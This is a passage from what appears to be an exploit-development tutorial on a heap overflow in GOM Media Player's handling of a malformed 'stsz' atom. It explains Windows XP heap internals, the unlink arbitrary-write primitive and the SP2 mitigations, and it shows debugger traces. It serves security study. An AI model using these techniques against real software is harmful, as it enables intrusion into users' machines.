cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
msvcrt!calloc+0x1c:
77c2c0df 3b450c          cmp     eax,dword ptr [ebp+0Ch] ss:0023:0022ff54=80000027

Here we can see that the (near) maximum value for a 32 bit register (0xFFFFFFE0) is divided by our first argument supplied to Calloc. The result is then compared against the second value supplied to calloc. If the second value is larger, Calloc is able to determine that an integer overflow will occur and exit.

However, the _Calloc function found in the GSFU module, unlike msvcrt!calloc, does not contain this check. Take a look at the following example:

#include <stdio.h>
#include <malloc.h>

int _calloc( size_t num, size_t size )
{
    size_t total = num * size;  // Integer overflow occurs here
    return (total);
}

int main( void )
{
    int size = 4;               // Size of Element
    int num = 0x80000017;       // Number of Elements
    int *buffer;
    int chunk_size = _calloc( size, num );
    printf ("Attempting to allocate a buffer with size: 0x%X\n", chunk_size);
    buffer = (int *)malloc(chunk_size);
    if( buffer != NULL )
          printf( "Allocated buffer with size (0x%X)\n",  _msize(buffer) );
    else
      printf( "Failed to allocate buffer.\n" );
    free( buffer );
}

Here we can see that instead of using the actual calloc function, we’re multiplying our two values (“Element Size” and “Number of Elements”) and storing the result in a variable called “chunk_size”. That value is then supplied as the size argument to malloc.

Using the values from our mutated seed, let’s take a look at our sample program’s output:

Attempting to allocate a buffer with size: 0x9C
Allocated buffer with size (0x9C)

As we expected, the application readily accepts our wrapped value (0x9C) and provides this as the size argument being supplied to malloc. This in turn will cause our buffer to be undersized allowing our heap overflow to occur.

Determining Exploitability

Excellent. So with that, we’ve successfully identified the root cause of our exception. Let’s summarize what we’ve already discovered:

We’ve determined that by manipulating the “Number of Elements” entry within the “stsz” atom, we can trigger an integer overflow.
The result of this integer overflow (wrapped value) is then supplied to ntdll!RtlAllocateHeap causing an undersized buffer to be created.
The contents of our “Sample Size Table” is then written to our buffer. However, since the “Sample Size Table” is larger, we’re able to write beyond the boundary of our chunk (heap overflow).

As with our previous vulnerability (KMPlayer), this level of control actually provides us with a number of ways to exploit this issue.

Challenges

Before we continue I’d like to outline some of the challenges we will face when attempting to exploit this issue (if for no other reason than to garner some sympathy for my likely “unreliable” techniques).

First, when dealing with heap issues, it is incredibly helpful to have some level of control over the heap layout. Allocations from the heap are dynamic and as such, the locations of these allocations will likely not be predictable. This is one reason why exploit writers will often leverage heap spraying in order to massage the heap into a deterministic state, allowing them to create predictable or semi-predictable locations in memory. Historically, this has been accomplished by calling the vulnerable application via it’s web browser plug-in (ActiveX) when available, and then leveraging a scripting language (typically JavaScript) in order to perform a series of allocations of user controlled data. Recently, our very own corelanc0d3r developed DEPS, which is a new method for performing a precise heap spray, allowing the exploit writer to point to an exact, reliable location in memory in order to access user supplied data. Unfortunately, GOM Media Player does not ship with a working version of it’s ActiveX control allowing us to call it via a web browser (an ActiveX object is included in the release, however it appears to have been built for a significantly older version and is functionally broken for this release). With that said, we either need to find another way to create a deterministic heap state or be incredibly lucky.
Next, most of the modules included with GOM Media Player are rebased. This means that we cannot reference any data from these modules directly as the addresses will likely change. The importance of this will be demonstrated in a bit.
And finally, anyone who has attempted to develop exploits based on the QuickTime (MPEG) file format can tell you that the working with the file format is not pleasant. Allocations are typically done on a per atom (and sub-atom) basis. Attempts to manipulate allocations and frees in order to control the heap layout are either incredibly difficult, or at times, impossible.

Prerequisites

In this article we will cover a number of basic concepts of the Windows XP SP3 heap manager. Rather than attempting to poorly reiterate the incredible work done by actual researchers in the past, I highly recommend that you read the following two documents as prerequisites prior to beginning this section.

Practical Windows XP/2003 Heap Exploitation by Chris Valasek and John McDonald
Exploiting Freelist[0] on XPSP2 by Brett Moore

I cannot stress enough the importance of the documents listed above. The intention of this article is to apply heap exploitation techniques discovered in the past to our GOM specific vulnerability. In order to do so, I must first reiterate a great deal of information that has already been explained (with greater depth and clarity) in the 2 documents listed above. This document is not intended to be a definitive guide and should not be used as one.

Heap Basics

Each application by default is provided with a singular heap, known as the default or process heap, to perform memory management functions. As application complexity increases and more requests are handled by the heap manager, an application can greatly improve performance by creating additional, private heaps. This is done by calling the HeapCreate function. Under WinDbg, you can enumerate a list of all active heaps by using the !heap extension.

0:000> !heap
Index   Address  Name      Debugging options enabled
  1:   00250000                
  2:   00360000                
  3:   00370000

Each heap contains a very important structure known as the heap base. This structure maintains information about the heap and it’s capabilities, as well as data regarding additional, referenced structures. Under WinDbg, you can enumerate the heap base structure by using the _HEAP variable name.

0:000> dt _HEAP 00250000                
ntdll!_HEAP
   +0x000 Entry            : _HEAP_ENTRY
   +0x008 Signature        : 0xeeffeeff
   +0x00c Flags            : 2
   +0x010 ForceFlags       : 0
   +0x014 VirtualMemoryThreshold : 0xfe00
   +0x018 SegmentReserve   : 0x100000
   +0x01c SegmentCommit    : 0x2000
   +0x020 DeCommitFreeBlockThreshold : 0x200
   +0x024 DeCommitTotalFreeThreshold : 0x2000
   +0x028 TotalFreeSize    : 0x86
   +0x02c MaximumAllocationSize : 0x7ffdefff
   +0x030 ProcessHeapsListIndex : 1
   +0x032 HeaderValidateLength : 0x608
   +0x034 HeaderValidateCopy : (null) 
   +0x038 NextAvailableTagIndex : 0
   +0x03a MaximumTagIndex  : 0
   +0x03c TagEntries       : (null) 
   +0x040 UCRSegments      : (null) 
   +0x044 UnusedUnCommittedRanges : 0x00250598 _HEAP_UNCOMMMTTED_RANGE
   +0x048 AlignRound       : 0xf
   +0x04c AlignMask        : 0xfffffff8
   +0x050 VirtualAllocdBlocks : _LIST_ENTRY [ 0x250050 - 0x250050 ]
   +0x058 Segments         : [64] 0x00250640 _HEAP_SEGMENT
   +0x158 u                : __unnamed
   +0x168 u2               : __unnamed
   +0x16a AllocatorBackTraceIndex : 0
   +0x16c NonDedicatedListLength : 1
   +0x170 LargeBlocksIndex : (null) 
   +0x174 PseudoTagEntries : (null) 
   +0x178 FreeLists        : [128] _LIST_ENTRY [ 0x259bd8 - 0x259bd8 ]
   +0x578 LockVariable     : 0x00250608 _HEAP_LOCK
   +0x57c CommitRoutine    : (null) 
   +0x580 FrontEndHeap     : 0x00250688 Void
   +0x584 FrontHeapLockCount : 0
   +0x586 FrontEndHeapType : 0x1 ''
   +0x587 LastSegmentIndex : 0 ''

Using either the default heap or private heaps, an application can then request (allocate) a region of memory to be used by the application. This can be performed by using several commands including but not limited to HeapAlloc, malloc, and new. Although the syntax of each command differs, the result is generally the same with a call being made to the ntdll!RtlAllocateHeap function in order to directly reserve our requested region of memory.

Now as the heap manager receives these requests, it will need to identify a suitable block to return back to the user. In order to identify which block to return, the heap manager will first check the front-end heap manager. If the front end heap manager can not service this request, the back end heap manager will be checked. In most cases, the back-end heap manager will be able to service the request*.

In rare cases where both the front-end and back-end managers are unable to service application requests, the heap will reserve the memory directly from an associated UCR segment. More information can be found on this structure in Practical Windows XP/2003 Exploitation by McDonald and Valasek.

Now in it’s most basic form, the front-end and back-end heap managers can simply be thought of as structures which maintain a list of pointers to free blocks (free blocks are simply regions of memory assigned to a particular heap that are ready for allocation). Under Windows XP, the front-end heap manager can exist (or not exist) in 3 forms: none, Lookaside Lists (LAL), or under rare cases the Low Fragmentation Heap (LFH)*. For the purpose of this article, we will only be discussing the Lookaside Lists (LAL).

Beginning with Windows Vista and beyond, the Low Fragmentation Heap (LFH) is the default front-end heap manager.

Lookaside Lists

Now as I mentioned, when an allocation request is issued, the heap manager will first check the front-end heap manager. Under Windows XP, this will (in nearly all cases) be the structure known as the Lookaside List (LAL). The LAL is used to service memory requests of 1016 bytes or less (plus 8 bytes for the heap entry header). Requests for memory regions larger than 1016 bytes will be forwarded to the back-end heap manager.

A pointer to this structure is located at offset +0x580 from the _HEAP base.

   +0x580 FrontEndHeap     : 0x00250688 Void

Now the top level hierarchy of the LAL structure contains 127 lists. Each list is associated with a LAL entry for that particular size. This creates a logical layout similar to the following:

Lookaside[0] # Unused 
Lookaside[1] # Unused 
Lookaside[2] # Size: 16 (0x10) – 0x8 (Header)  Usable Size: 8 (0x8)
Lookaside[3] # Size: 24 (0x18) - 0x8 (Header)  Usable Size: 16 (0x10)
<…truncated…>
Lookaside[127] # Size: 1016 (0x3F8) - 0x8 (Header)  Usable Size: 1008 (0x3F0)

Each list head is 0x30 bytes in length and has the following structure:

Flink: Ptr32
Depth: Uint2B
Sequence: Uint2B
Depth2: Uint2B
MaximumDepth: Uint2B
TotalAllocates: Uint4B
AllocateMisses/AllocateHits: Uint4B
TotalFrees: Uint4B
FreeMisses/FreeHits: Uint4B
Type: Uint4B
Tag: Uint4B
Size: Uint4B
Allocate: Uint4B
Free: Uint4B

Please note, that the Flink, or forward link pointer, points to the first chunk in the list. If this value is NULL, this means that this list head is empty and does not reference any LAL chunks. A chunk on the LAL will have the following structure:

Self Size: Uint2B  -  Size of current chunk
Previous Size: Uint2B  -  Size of previous Chunk
Chunk Cookie: Uint1B  -  Security Cookie
Chunk Flag: Uint1B
Unused: Uint1B
Segment Index: Uint1B
Flink: Ptr32  -  Pointer to next chunk in current list

Please note that the Flink in this case will point to the next chunk in the list. If this value is NULL, this means this is the last chunk in our list.

This all may seem quite confusing at first. However, let’s see if we can put it all together by analyzing the following scenario. Consider for a moment, that we have an active Lookaside list associated with our default heap (0x00160000), with multiple entries on LAL nodes 2 and 3 (sizes 16 and 24 bytes respectively). This would create a logical structure similar to the following:

Please note: This information was generated using the “!py mona heap -h 0x00160000 –t fea” command. Please see mona’s help output for further information.

LAL [2] @0x0016006e8, Expected Chunksize 0x10 (16), Flink : 0x00163730
  3 chunks:
     ChunkPtr: 0x00163728, UserPtr: 0x00163730, Flink: 0x00164498, ChunkSize: 0x10, UserSize: 0x4, Userspace: 0x8 (Busy) 
     ChunkPtr: 0x00164490, UserPtr: 0x00164498, Flink: 0x00164228, ChunkSize: 0x10, UserSize: 0x8, Userspace: 0x8 (Busy) 
     ChunkPtr: 0x00164220, UserPtr: 0x00164228, Flink: 0x00000000, ChunkSize: 0x10, UserSize: 0x8, Userspace: 0x8 (Busy) 

LAL [3] @0x00160718, Expected Chunksize 0x18 (24), Flink : 0x00164238
  2 chunks:
     ChunkPtr: 0x00164230, UserPtr: 0x00164238, Flink: 0x00164210, ChunkSize: 0x18, UserSize: 0xc, Userspace: 0x10 (Busy) 
     ChunkPtr: 0x00164208, UserPtr: 0x00164210, Flink: 0x00000000, ChunkSize: 0x18, UserSize: 0x10, Userspace: 0x10 (Busy)

Now let’s break it down. Here we can see that there are 3 entries associated with LAL [2]. The chunk size for these entries are 0x10 bytes with 0x8 bytes of usable space (as 0x8 bytes are reserved for the chunk header). The Flink of our list head points to the first chunk in this LAL at address 0x00163730. Looking at our list, we can see our chunk as designated by the ChunkPtr with an address of 0x00163728. This chunk has a Flink of 0x00164498 which points to the next chunk in or list. Continuing along the chain, we see that our final chunk has a Flink of 0x00000000. This means that this is the final chunk in the list.

This method of pointing to, or identifying the next chunk in the list, creates what is known as a "singly-linked" list. Meaning that we have 1 variable which will always point to the next chunk in the list until we’ve reached the end.

Looking at our second list head (LAL [3]), we see much of the same. There are 2 chunks associated with this list. The Flink on the list head points to a chunk at 0x00164230 and this chunk has a Flink pointing to the final chunk on the list with an address of 0x00164210. These entries are of course 0x18 bytes in size with 0x10 bytes of usable space.

Now if the application were to request 0x10 bytes of space, the heap manager would begin looking at the Lookaside List. It would traverse the list until it landed upon LAL [3]. You may be wondering however, why the heap manager wouldn’t select LAL[2] to service this allocation? Well, remember that although the list size is 0x10 bytes, 0x8 bytes are reserved for the chunk header. So instead, LAL [3] would be chosen as it would be able to provide the 0x10 bytes of usable space needed by the application. Now when attempting to allocate data from the LAL, chunks are handled in a last in, first out (LIFO) order. Since freed chunks are placed at the beginning of the list, the first chunk in the list will be the one that is returned to the application when an allocation request of the same size is received.

So back to our list. If an allocation request is received for 0x10 bytes, the application would identify LAL [3], follow the Flink of the list head which points to 0x00164498 and return this chunk. This process is called “unlinking” as the free chunk is unlinked from the Lookaside List and returned. This would leave the list looking like this:

LAL [3] @0x00160718, Expected Chunksize 0x18 (24), Flink : 0x00164210
  1 chunk:
     ChunkPtr: 0x00164208, UserPtr: 0x00164210, Flink: 0x00000000, ChunkSize: 0x18, UserSize: 0x10, Userspace: 0x10 (Busy)

So here we can see that our chunk has been removed and that the Flink of the list head has been updated to point to the next Chunk in the list. This means that the next request with a size of 0x10 bytes will be return 0x00164210 (assuming no new chunks have been freed, or “linked” to LAL[3]).

Excellent. Now that we’ve covered that, we can move on to the back end allocator also known as the Freelists. However, as many of these principals will also apply to the Freelists, it is very important that you understand the LAL structure before moving on.

Freelists

As I mentioned earlier, if a request cannot be serviced by the front end allocator, in this case the Lookaside Lists, it is then forwarded on to the backend allocator. Under Windows XP (and later versions), this is known as the Freelists. It’s important to understand that allocation requests may be forwarded to the Freelists for one of two reasons. First, if the allocation request is for a size greater than 1016 bytes (the maximum size handled by the LAL), the request will be forwarded on to the Freelists. Also, if an allocation request is issued for a size not present on the LAL, meaning that no chunks are available for that size, it’ll be forwarded on to the Freelists.

As with the LAL, a pointer to the Freelists structure can be found at offset +0x178 from the heap base. Furthermore, like the LAL, each list head entry on the Freelists is organized based upon size. This size equates to the list head position * 0x8 (just like the LAL). The only exception to this rule is Freelist[0], which is responsible for managing all requests greater than 1024 bytes. Consider the following layout.

Freelist[0] # Manages all sizes > 1024 
Freelist[1] # Unused 
Freelist[2] # Size: 16 (0x10)
Freelist[3] # Size: 24 (0x18)
<…truncated…>
Freelist[127] # Size: 1016

Each Freelist list head has the following structure:

ntdll!_LIST_ENTRY
   +0x000 Flink            : Ptr32 _LIST_ENTRY
   +0x004 Blink            : Ptr32 _LIST_ENTRY

The Flink, or forward link pointer in the list head will point to the first free chunk in the list entry. The Blink, or backward link pointer, will point to the UserPtr of the last chunk in the list. If however, the list is empty, both the Flink and Blink will point to themselves.

Using the _LIST_ENTRY variable, we can enumerate a bit about the Freelist structure. In this example, we’ll be looking at Freelist[0] belonging to the heap at 0x00160000.

Please note, the addresses of the list heads will always have a static offset from the heap base. For instance, Freelist[0] will always exist at offset +0x178 from the heap base.

0:012> dt _LIST_ENTRY 00160178
ntdll!_LIST_ENTRY
 [ 0x51b4468 - 0x51b6010 ]
   +0x000 Flink            : 0x051b4468 _LIST_ENTRY [ 0x51b6010 - 0x160178 ]
   +0x004 Blink            : 0x051b6010 _LIST_ENTRY [ 0x160178 - 0x51b4468 ]

Here we can see that Freelist[0] is not in fact, empty. If it were, both the Flink and Blink would have pointers to 0x00160178. On the contrary however, following the Flink we can see that the UserPtr of the first chunk in the list is located at 0x051B4468. We can also see that the UserPtr of the last chunk in the list is located at 0x051B6010. This however, leaves quite a bit unanswered as we don’t currently know how many chunks belong to Freelist[0]. Before we determine that, we first must discuss the structure of the chunks belonging to the Freelists.

Self Size: Uint2B  -  Size of current chunk
Previous Size: Uint2B  -  Size of previous Chunk
Chunk Cookie: Uint1B  -  Security Cookie
Chunk Flag: Uint1B
Unused: Uint1B
Segment Index: Uint1B
Flink: Ptr32  -  Pointer to next chunk in current list
Blink: Ptr32  - Pointer to previous chunk in current list

As with the Freelist list head, we can see that the Freelists chunks themselves also contain Flink and Blink pointers. In this case, the Flink in Blink pointers are used to point to the chunk prior to and after the current chunk, depending on the location in the list. In the case of the first chunk in the list, the Blink would point back to the list head. In the case of the last chunk in the list, the Flink would also point back to the list head. This creates what is known as a doubly-linked list as every element in the structure contains a pointer to identify the elements which precede and follow the current element.

Once again, let’s evaluate the following Freelist in order to better understand its structure. Again, using the example of our default heap (0x00160000):

This information can be derived using the following !mona command:

!py mona heap -h 0x00160000 -t bea

[+] FreeList[00] at 0x00160178, Expected size: >1016 (>0x3f8)
     ChunkPtr: 0x0018f8c8, Header: 0x8 bytes, UserPtr: 0x0018f8d0, Flink: 0x00191e40, Blink: 0x00160178, ChunkSize: 0x1da8 (7592), Usersize: 0x1d9e (7582) 
     ChunkPtr: 0x00191e38, Header: 0x8 bytes, UserPtr: 0x00191e40, Flink: 0x00181218, Blink: 0x0018f8d0, ChunkSize: 0x21c8 (8648), Usersize: 0x21c0 (8640) 
     ChunkPtr: 0x00181210, Header: 0x8 bytes, UserPtr: 0x00181218, Flink: 0x00160178, Blink: 0x00191e40, ChunkSize: 0x9600 (38400), Usersize: 0x95f8 (38392) 
[+] FreeList[02] at 0x00160188, Expected size: 0x10 (16)
     ChunkPtr: 0x0017cdc0, Header: 0x8 bytes, UserPtr: 0x0017cdc8, Flink: 0x00169280, Blink: 0x00160188, ChunkSize: 0x10 (16), Usersize: 0x8 (8) 
     ChunkPtr: 0x00169278, Header: 0x8 bytes, UserPtr: 0x00169280, Flink: 0x00160188, Blink: 0x0017cdc8, ChunkSize: 0x10 (16), Usersize: 0x8 (8) 
[+] FreeList[03] at 0x00160190, Expected size: 0x18 (24)
     ChunkPtr: 0x0018dac0, Header: 0x8 bytes, UserPtr: 0x0018dac8, Flink: 0x00160190, Blink: 0x00160190, ChunkSize: 0x18 (24), Usersize: 0x10 (16)

Looking at Freelist[0], we can see that there are 3 chunks, each of which is greater than 1024 bytes. Looking at the first chunk, we can see that the Flink points to the UserPtr of the next chunk. The Blink however in this case, points back to the list head. The second chunk in the list again has a Flink pointing to the next chunk and a Blink pointing back to the first chunk. This behavior continues with the remaining chunks in the list with the exception of our final chunk. In order to complete our doubly-linked list, we can see that the final chunk contains a Flink which points back to the list head.

With Freelist[2], we again see much of the same. Here we have 2 chunks, our first of which contains a Flink to the next chunk and a Blink pointing back to the list head. Our second chunk contains a Blink pointing back to the first chunk and a Flink pointing to the list head.

Freelist[3] however, we can see that as there is only a single chunk in the list, both the Flink and Blink point back to the list head.

Now consider the following scenario. If the application were to issue an allocation request for 8000 (0x1F40) bytes, the heap manager would first evaluate the size and determine that it is too large to be serviced by the LAL. With this, the request would then be forwarded on to the Freelists. As the requested size is greater than 1024 bytes, the heap manager would then begin traversing Freelist[0] as this is the only list which tracks chunks greater than 1024 bytes. Moving along the list, the heap manager would select the 2nd chunk in Freelist[0] as it is the first chunk in the list larger than 8000 bytes. However, we run into a slight issue as the chunk we’ve selected is actually larger than the chunk size requested (8648 > 8000). What ends up happening is that the heap manager will “unlink” the 8000 bytes requested by the application. Then, a new chunk will be created using the 648 bytes remaining (640 bytes actually as we must account for 8 bytes for the heap header). As this chunk is no longer greater than 1024 bytes, it will be moved to a Freelist[80]*** (which manages chunks 640 (0x280) bytes in length). The chunks in Freelist[0] will then have their Flink and Blink pointers updated to account for the now missing chunk.

***Please note: When a chunk is resized, a new independent chunk is not always created. If the remaining space is adjacent to other free heap chunks, this space may then be coalesced, or combined, with the adjacent heap chunks to create a singular, larger heap chunk. Again, a significantly better and more thorough explanation can be found in Practical Windows XP/2003 Exploitation by McDonald and Valasek.

The result of this allocation request would then modify our Freelist structure as follows:

[+] FreeList[00] at 0x00160178, Expected size: >1016 (>0x3f8)
     ChunkPtr: 0x0018f8c8, Header: 0x8 bytes, UserPtr: 0x0018f8d0, Flink: 0x00181218, Blink: 0x00160178, ChunkSize: 0x1da8 (7592), Usersize: 0x1d9e (7582) 
     ChunkPtr: 0x00181210, Header: 0x8 bytes, UserPtr: 0x00181218, Flink: 0x00160178, Blink: 0x0018f8d0, ChunkSize: 0x9600 (38400), Usersize: 0x95f8 (38392) 
[+] FreeList[02] at 0x00160188, Expected size: 0x10 (16)
     ChunkPtr: 0x0017cdc0, Header: 0x8 bytes, UserPtr: 0x0017cdc8, Flink: 0x00169280, Blink: 0x00160188, ChunkSize: 0x10 (16), Usersize: 0x8 (8) 
     ChunkPtr: 0x00169278, Header: 0x8 bytes, UserPtr: 0x00169280, Flink: 0x00160188, Blink: 0x0017cdc8, ChunkSize: 0x10 (16), Usersize: 0x8 (8) 
[+] FreeList[03] at 0x00160190, Expected size: 0x18 (24)
     ChunkPtr: 0x0018dac0, Header: 0x8 bytes, UserPtr: 0x0018dac8, Flink: 0x00160190, Blink: 0x00160190, ChunkSize: 0x18 (24), Usersize: 0x10 (16) 
[+] FreeList[80] at 0x001603f8, Expected size: 0x280 (640)
     ChunkPtr: 0x00193d80, Header: 0x8 bytes, UserPtr: 0x00193d88, Flink: 0x001603f8, Blink: 0x001603f8, ChunkSize: 0x280 (640), Usersize: 0x280 (640)

Here we can see that Freelist[0] now contains only 2 chunks. Boh of which have had their Flink and Blink pointers updated so that they point at each other. Furthermore, we can see the addition of our chunk at Freelist[80].

Preventative Security Measures

Safe-Unlinking

Now before we attempt to exploit this bug there’s a few minor details that we must cover. Prior to Windows XP SP2, gaining an 4 byte arbitrary write was a fairly straightforward process. Although at the time, not many people were exploiting heap based bugs as the amount of documentation regarding the subject was very limited. One method available targeted the unlink process of chunks belonging to a doubly-linked list.

Now although we’ve only discussed the Freelists in this manner, I must mention that VirtualAllocd chunks are also maintained using a doubly linked list. Exploitation of these structures was first publically documented by Halvar Flake in his 2002 paper, “Third Generation Exploitation”

If an attacker were able to overwrite beyond the bounds of an allocated heap chunk into a free chunk managed by the Freelists and overwrite the Flink and Blink of the chunk’s header, upon unlinking that chunk, an arbitrary, 4-byte write could be achieved. To better explain this, let’s look at the following example.

[+] FreeList[00] at 0x00160178, Expected size: >1016 (>0x3f8)
     ChunkPtr: 0x00160000, Header: 0x8 bytes, UserPtr: 0x00160008, Flink: 0x00161008, Blink: 0x00160178, ChunkSize: 0x400 (1024), Usersize: 0x410 (1025) 
     ChunkPtr: 0x00161000, Header: 0x8 bytes, UserPtr: 0x00161008, Flink: 0x00162008, Blink: 0x00160008, ChunkSize: 0x500 (1280), Usersize: 0x500 (1280) 
     ChunkPtr: 0x00162000, Header: 0x8 bytes, UserPtr: 0x00162008, Flink: 0x00160178, Blink: 0x00161008, ChunkSize: 0x600 (1536), Usersize: 0x600 (1536)

# Allocated Chunk where our overflow originates:
Chunk 0x00160fe0 (Usersize 0x20)

Here we can see that we’ve got 3 free chunks both of which are managed by Freelist[0]. Our allocated chunk where our overflow begins is located at 0x00180FE0 with a size of 0x20 bytes. If we are able to write 0x10 (16) bytes beyond our buffer, we can successfully overwrite the metadata of the free chunk located at 0x00181000, including the Flink and Blink pointers. For the purpose of demonstration, let’s assume that we’ve overwritten the Flink and Blink pointers with “AAAA” (0x41414141) and “BBBB” (0x42424242) respectively. This would leave our Freelist structure as follows:

Please note that this example makes the assumption that the size field of the overwritten chunk has been overwritten with it’s previous value of 0x500.

[+] FreeList[00] at 0x00160178, Expected size: >1016 (>0x3f8)
     ChunkPtr: 0x00160000, Header: 0x8 bytes, UserPtr: 0x00160008, Flink: 0x00161008, Blink: 0x00160178, ChunkSize: 0x400 (1024), Usersize: 0x410 (1025) 
     ChunkPtr: 0x00161000, Header: 0x8 bytes, UserPtr: 0x00161008, Flink: 0x41414141, Blink: 0x42424242, ChunkSize: 0x500 (1280), Usersize: 0x500 (1280) 
     ChunkPtr: 0x00162000, Header: 0x8 bytes, UserPtr: 0x00162008, Flink: 0x00160178, Blink: 0x00161008, ChunkSize: 0x600 (1536), Usersize: 0x600 (1536)

# Allocated Chunk where our overflow originates:
Chunk 0x00160fe0 (Usersize 0x20)

Now, if an allocation request were issued for 0x4F8 (-0x8 bytes to account for the chunk header), the application would find our chunk located at 0x00161008 and attempt to unlink it. In doing so, it would also attempt to update the Flink and Blink pointers of the chunk which precedes and follows our overwritten chunk (respectively). When this occurs, the following 2 instructions are executed:

ecx=0x42424242 ; Blink
eax=0x41414141 ; Flink

mov     dword ptr [ecx],eax ; Write 0x41414141 to 0x42424242
mov     dword ptr [eax+4],ecx ; Write 0x42424242 to 0x41414145

Here we can see that as long as both the Flink and Blink are locations with READWRITE access, the unlink process essentially triggers an arbitrary 4-byte write. Now with the advent of XP SP2, these type of overwrites no longer exist due to what is known as safe-unlinking. Safe-unlinking is essentially a small set of instructions which validate the Flink and Blink pointers of the unlinked chunk to ensure that the doubly-linked list has been maintained. If this check fails, the chunk will not be unlinked and a call to ntdll!RtlpHeapReportCorruption will be made. This check is performed by the following 5 instructions.

7C910F1E                 mov     edi, [ecx]
7C910F20                 cmp     edi, [eax+4]
7C910F23                 jnz     loc_7C936934
7C910F29                 cmp     edi, edx
7C910F2B                 jnz     loc_7C936934

Heap Cookies

In addition to safe-unlinking, XP SP2 also introduced heap cookies. Heap cookies are simply a single byte value placed at offset +0x4 the heap chunk header. It is only checked during the freeing of a free chunk marked as busy. If the value is corrupt a call is made to ntdll!RtlpHeapReportCorruption.

Application Specific Exploitation

As we discussed above, the advent of XP SP2 introduced several hardening measures in to the Windows heap manager which made generic exploitation of heap based overflows more difficult to say the least. In some cases, exploitation may be impossible. With this, even back in 2004 when researchers were developing new, generic techniques for bypassing protections within the XP SP2 heap manager, most concluded that although there are methods available to bypass these protections, the future of exploitation would likely rely on identifying application specific methods. We certainly can see this today with the complexity of heap management growing, the enforcement of counter measures such as ASLR and DEP, as well as the introduction of custom allocators and sandboxing techniques. With that, the focus of this article will be to identify an application specific method for exploitation. Although this article primarily focuses on the Windows XP heap manager, the technique described below can likely be applied in this application specific instance to later versions of Microsoft Windows as well.

And with that, let’s use the information we discussed above in order to reexamine our faulty function. We’ll begin by enumerating all data structures which control what data is read and where it is written to. Looking at our faulting block there are 4 instructions that are of great interest to us:

GSFU!DllUnregisterServer+0x23685                 movzx   edx, byte ptr [esi]
GSFU!DllUnregisterServer+0x236a3                 mov     ecx, [edi+28h]
GSFU!DllUnregisterServer+0x236a6                 mov     ecx, [ecx+10h]
GSFU!DllUnregisterServer+0x236a9                 mov     [ecx+eax*4], edx

The first instruction is where the contents of our Sample Size Table is read from poi(esi) and then stored in edx. Our final instruction is of course where our write occurs as well as the location of our initial access violation. Looking at our write instruction, we can see that the data from our Sample Size Table is being written to the location defined by poi(ecx+eax*4). If you recall from our earlier discussion of this function, eax is our incremental value. This value will be incremented by one during each iteration of our loop. The value we are really concerned with here is ecx. This register will serve as the base value for our write location. The preceding two instructions have been included as they will help us to identify where ecx derives its value. In our second instruction, we can see that ecx is assigned the value pointed at by edi+28. Then, ecx is reassigned to the value pointed to by it’s own offset of +0x10.

With that said, let’s set some breakpoints and take a look at each of these locations.

bp GSFU!DllUnregisterServer+0x23685
bp GSFU!DllUnregisterServer+0x236a3
bp GSFU!DllUnregisterServer+0x236a6
bp GSFU!DllUnregisterServer+0x236a9

Unless instructed to do so, ensure that GFlags is disabled. You can do this by executing the following command:

gflags.exe /p /disable GOM.exe

With you’re breakpoints set, let’s continue execution until our first bp is hit.

Breakpoint 0 hit
eax=00000000 ebx=000000ec ecx=03207228 edx=80000027 esi=03207134 edi=032070d0
eip=03b34965 esp=0012bdb4 ebp=03207120 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200206
GSFU!DllUnregisterServer+0x23685:
03b34965 0fb616          movzx   edx,byte ptr [esi]         ds:0023:03207134=00

Here we can see that the first byte of our Sample Size Table is being loaded into edx from the location pointed to by esi. Once again we can use the !mona extension to enumerate a great deal of information regarding this location.

0:000> !py mona info -a 03207134
Hold on...
[+] Generating module info table, hang on...
    - Processing modules
    - Done. Let's rock 'n roll.
[+] NtGlobalFlag: 0x00000000
    No GFlags set

[+] Information about address 0x03207134
    ascii {PAGE_READWRITE}
    Address is part of page 0x03200000 - 0x03209000
    This address resides in the heap

Address 0x03207134 found in 
    _HEAP @ 03200000, Segment @ 03200680
                      (         bytes        )                   (bytes)
      HEAP_ENTRY      Size  PrevSize    Unused Flags    UserPtr  UserSize Remaining - state
        03207118  00000108  00000050  00000008  [01]   03207120  00000100  00000000   Busy  (hex)
                  00000264  00000080  00000008                   00000256  00000000   Busy  (dec)

      Chunk header size: 0x8 (8)
      Size initial allocation request: 0x100 (256)
      Total space for data: 0x100 (256)
      Delta between initial size and total space for data: 0x0 (0)
      Data : 00 00 01 00 73 74 73 7a 00 00 00 00 00 00 00 00 80 00 00 27 00 00 94 b5 00 00 52 d4 00 00 52 a8 ...

Excellent. So here we can see that our data is being read from a heap chunk that belongs to the private heap located at 0x03200000. It’s also important to note that the requested size of this heap chunk was 0x100. This is important as this is the same value used for the size field of our ‘stsz’ atom. Manipulating this field in the file will also likely change our allocation size. More on this in a bit. For now, let’s continue on to our second breakpoint.

Breakpoint 1 hit
...truncated...

03b34983 8b4f28          mov     ecx,dword ptr [edi+28h] ds:0023:032070f8=03207228
0:000> !py mona info -a 032070f8
...truncated...
    This address resides in the heap

Address 0x032070f8 found in 
    _HEAP @ 03200000, Segment @ 03200680
                      (         bytes        )                   (bytes)
      HEAP_ENTRY      Size  PrevSize    Unused Flags    UserPtr  UserSize Remaining - state
        032070c8  00000050  00000020  00000008  [01]   032070d0  00000048  00000000   Busy  (hex)
                  00000080  00000032  00000008                   00000072  00000000   Busy  (dec)

Good. Ok, so once again we see that we’re dealing with another chunk that belongs to the private heap located at 0x03200000. This chunk contains the pointer 0x03207228 which get’s assigned to ecx. Let’s go ahead and hit our 3rd break point and take a look at that location as well.

Breakpoint 2 hit
...truncated...

03b34986 8b4910          mov     ecx,dword ptr [ecx+10h] ds:0023:03207238=03207248
0:000&gt; !py mona info -a 03207238
...truncated...

Address 0x03207238 found in 
    _HEAP @ 03200000, Segment @ 03200680
                      (         bytes        )                   (bytes)
      HEAP_ENTRY      Size  PrevSize    Unused Flags    UserPtr  UserSize Remaining - state
        03207220  00000020  00000108  0000000c  [01]   03207228  00000014  00000004   Busy  (hex)
                  00000032  00000264  00000012                   00000020  00000004   Busy  (dec)

And once again, we see that we’re dealing with a 3rd chunk that belongs to the private heap located at 0x03200000. Now on to our final write location.

Breakpoint 3 hit
...truncated...

03b34989 891481          mov     dword ptr [ecx+eax*4],edx ds:0023:03207248=00000000
0:000> !py mona info -a 03207248
...truncated...

Address 0x03207248 found in 
    _HEAP @ 03200000, Segment @ 03200680
                      (         bytes        )                   (bytes)
